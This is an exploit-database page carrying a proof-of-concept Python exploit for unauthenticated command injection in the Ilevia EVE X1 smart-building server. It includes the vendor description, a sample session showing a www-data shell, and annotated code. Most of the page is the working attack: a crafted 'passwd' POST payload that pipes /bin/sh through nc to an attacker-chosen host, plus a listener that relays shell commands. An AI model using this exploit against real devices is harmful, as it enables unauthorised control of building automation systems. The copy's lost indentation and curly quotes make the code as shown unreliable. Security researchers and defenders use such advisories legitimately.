Exploit Details
Basic Information
| Exploit Title | Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion |
|---|---|
| Exploit ID | ZSL-2025-5956 |
| Type | zeroscience |
| Published | 2025-07-31T00:00:00 |
| Modified | 2025-07-31T00:00:00 |
CVSS Information
| Severity | NONE |
|---|---|
| Vector | NONE |
Exploit Description
Exploit Code
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
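# Desc: The EVE X1 server suffers from an unauthenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary shell
# commands through the ‘passwd’ HTTP POST parameter in the /ajax/php/login.php script.
# The injected commands run as the web server account (www-data in the session
# shown below). Operators of affected versions should keep the device's web
# interface off untrusted networks and review web-server logs for POST requests
# to this script.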
#
# ——————————————————————————
# $ python eve.py 10.0.0.17:8080 10.0.0.3 5555
# [+] Cyber-link active on 0.0.0.0:5555…
# [*] Firing at http://10.0.0.17:8080/ajax/php/login.php
# [+] Pulse from 10.0.0.17:40040
# [*] Probing matrix with ‘pwd’ signal…
# [+] Verifistring: /home/ilevia/www-config/http/ajax/php
# [*] Synaptic intrusion confirmed, escalating to holo-shell…
# [+] Holo-shell online. ‘exit’ to disengage.
# >> id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# >> uname -a
# Linux x1-eve 5.4.35-sunxi #trunk SMP Thu Apr 23 18:06:21 CEST 2020 armv7l GNU/Linux
# >> exit
# ——————————————————————————
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5956
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5956.php
#
#
# 01.05.2024
#
import socket, telnetlib, threading, time, requests, sys
def init_quantum(target_data):
# Normalise the first command-line argument into a base URL string.
# Returns the value with a scheme, an explicit port and no trailing slash.
# NOTE(review): indentation and straight quotes were lost in this copy of the
# listing, so the block nesting below is inferred from the statements.
# Prepend "http://" when neither scheme substring is present.
if “http://” not in target_data and “https://” not in target_data:
target_data = “http://” + target_data
# Append ":80" when the part after "//" contains no colon.
# NOTE(review): an "https://host" value with no port also gets ":80" here.
if “:” not in target_data.split(“//”)[1]:
target_data = target_data.rstrip(“/”) + “:80”
return target_data.rstrip(“/”)
def spark_neuroport(cyber_gate):
# Start a background thread that listens on TCP port `cyber_gate`, accepts one
# inbound connection and then relays operator-typed lines over it.
# Returns the started threading.Thread so the caller can join() it.
# NOTE(review): indentation was lost in this copy of the listing; the nesting
# described in these comments is inferred from statement order and messages.
def neuro_core():
# Worker run by the thread: one listening socket, one accepted peer.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Binds on all interfaces (0.0.0.0), not only the callback address.
s.bind((“0.0.0.0”, cyber_gate))
s.listen(1)
print(f”[+] Cyber-link active on 0.0.0.0:{cyber_gate}…”)
# Blocks until the device connects back; there is no accept timeout.
conn, addr = s.accept()
print(f”[+] Pulse from {addr[0]}:{addr[1]}”)
# A Telnet object is created and handed the socket, but holo_term is not
# referenced again in the visible code.
holo_term = telnetlib.Telnet()
holo_term.sock = conn
print(“[*] Probing matrix with ‘pwd’ signal…”)
# Sanity probe: ask the peer for its working directory.
conn.sendall(b”pwd\n”)
time.sleep(0.5)
try:
data_stream = conn.recv(4096).decode(errors=’ignore’)
data_nodes = data_stream.splitlines()
# Drop the first line when it is just the echoed command.
if data_nodes and data_nodes[0].strip() == “pwd”:
data_nodes.pop(0)
output = “\n”.join(data_nodes).strip()
print(“[+] Verifistring:”, output)
# The substring matches the web root shown in the header transcript
# (/home/ilevia/www-config/http/ajax/php).
if ‘ilevia/www-config’ in output:
print(“[*] Synaptic intrusion confirmed, escalating to holo-shell…”)
# Re-runs /bin/sh under script(1). For defenders: on the device this is a
# `script` process started by the web-server account (www-data in the
# header transcript), which is a usable process-lineage signal.
conn.sendall(b”script /dev/null -c /bin/sh\n”)
time.sleep(0.5)
try:
_ = conn.recv(4096)
# Bare except: any error while draining the reply is silently ignored.
except:
pass
# Presumably pairs with the 'ilevia/www-config' check above — TODO confirm
# against a copy of the listing that kept its indentation.
else:
print(“[!] Expected neural path not detected. Holo-shell may be unstable.”)
except Exception as e:
print(f”[!] Error in synaptic probe: {e}”)
# Banner text only; it has no effect on the connection.
print(“””
_…._
.’ ‘.
/ __ \\
| .’ \ /
\ | /.’
\ |
‘.\ _
\_><_\\
| `-._ _…__
| -““ “”-,
|, _. )
/ /“”‘—“`|-‘
/ | .-‘ ‘-;
| \ 6_) 6_)\\
\ ‘. ) \\ BZZT! Once you blast that holo-shell wide open on the EVE X1 grid,
‘. ,—‘ _.–.` / you’re cruisin’ the neon datastreams, baby!
‘-.._\- `””`.’ Judy Jetson, your cosmic code-slinger, zappin’ through the quantum void!
`’-. .–‘ PEW PEW!
.=========| |=========,
‘. | | .’
`-._ `-._| .-‘
`-._ `_.-‘
‘-.-‘
“””)
print(“[+] Holo-shell online. ‘exit’ to disengage.”)
# Line-oriented relay loop: read a line locally, send it, print one reply.
while True:
try:
cmd = input(“>> “).strip()
# "exit" is handled locally and is not sent to the peer.
if cmd == “exit”:
break
if not cmd:
continue
conn.sendall((cmd + “\n”).encode())
# Fixed delay followed by a single recv() of at most 7777 bytes.
time.sleep(0.3)
data_stream = conn.recv(7777).decode(errors=’ignore’)
data_nodes = data_stream.splitlines()
# Strip the echoed command line and a trailing bare prompt ("$" or "#").
if data_nodes and data_nodes[0].strip() == cmd:
data_nodes.pop(0)
if data_nodes and data_nodes[-1].strip() in [“$”, “#”]:
data_nodes.pop(-1)
print(“\n”.join(data_nodes).strip())
# Any exception in the loop body ends the session.
except Exception:
print(“[!] Neural link terminated.”)
break
conn.close()
# Thread is created with default settings and started before being returned.
cyber_thread = threading.Thread(target=neuro_core)
cyber_thread.start()
return cyber_thread
def fire_photon(target_matrix, cyber_origin, cyber_gate):
# Send a single HTTP POST to `target_matrix` with the command string placed in
# the 'passwd' form field; `cyber_origin` and `cyber_gate` are interpolated
# into that string as the callback host and port. Returns nothing.
# NOTE(review): indentation and straight quotes were lost in this copy.
print(f”[*] Firing at {target_matrix}”)
# The value starts with ';' and chains commands that create a FIFO at /tmp/pipe
# and connect /bin/sh to nc. For defenders, the observable artifacts are:
#   - a POST to /ajax/php/login.php whose passwd field contains shell
#     metacharacters (';', '|', '<', '>') and the fixed userid "george";
#   - a FIFO named /tmp/pipe on the device;
#   - an nc process making an outbound TCP connection, running as the
#     web-server account (www-data in the header transcript).
# The server-side script is not shown here; per the advisory header, the
# passwd value reaches an OS command, so the fix presumably belongs in how
# login.php passes that value to the shell — confirm against the vendor code.
payload = f”;mknod /tmp/pipe p; /bin/sh -i < /tmp/pipe | nc {cyber_origin} {cyber_gate} > /tmp/pipe”
try:
requests.post(target_matrix, data={“userid”:”george”,”passwd”:payload}, timeout=3)
print(“[*] Photon fired.”)
# A read timeout after 3 seconds is treated as the normal outcome and ignored.
except requests.exceptions.ReadTimeout:
pass # Expected when cyber-link engages
# Every other requests failure (connection refused, DNS, TLS, ...) is reported.
except requests.exceptions.RequestException as e:
print(f”[!] Photon failed: {e}”)
def boot_sequence():
# Command-line entry point: validate the three arguments, build the login
# script URL, start the listener thread, send the request and wait for the
# listener thread to finish.
# NOTE(review): indentation and straight quotes were lost in this copy.
if len(sys.argv) != 4:
# NOTE(review): the usage line below is cut off in this copy (no closing
# quote or parenthesis); the argument placeholders appear to have been lost
# in extraction. The example line shows the expected order:
# target host:port, callback address, callback port.
print(f”Usage: {sys.argv[0]}
print(“Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555”)
sys.exit(1)
target_data = sys.argv[1]
cyber_origin = sys.argv[2]
# The port must parse as an integer; no range check is applied.
try:
cyber_gate = int(sys.argv[3])
except ValueError:
print(“[!] Cyber gate must be numeric.”)
sys.exit(1)
# Fixed path of the login script named in the advisory header.
target_matrix = init_quantum(target_data) + “/ajax/php/login.php”
neuro_thread = spark_neuroport(cyber_gate)
# One-second pause so the listener thread can bind before the request is sent.
time.sleep(1)
fire_photon(target_matrix, cyber_origin, cyber_gate)
# Blocks until the listener thread returns.
neuro_thread.join()
# Run boot_sequence() only when the file is executed as a script, not on import.
if __name__ == “__main__”:
boot_sequence()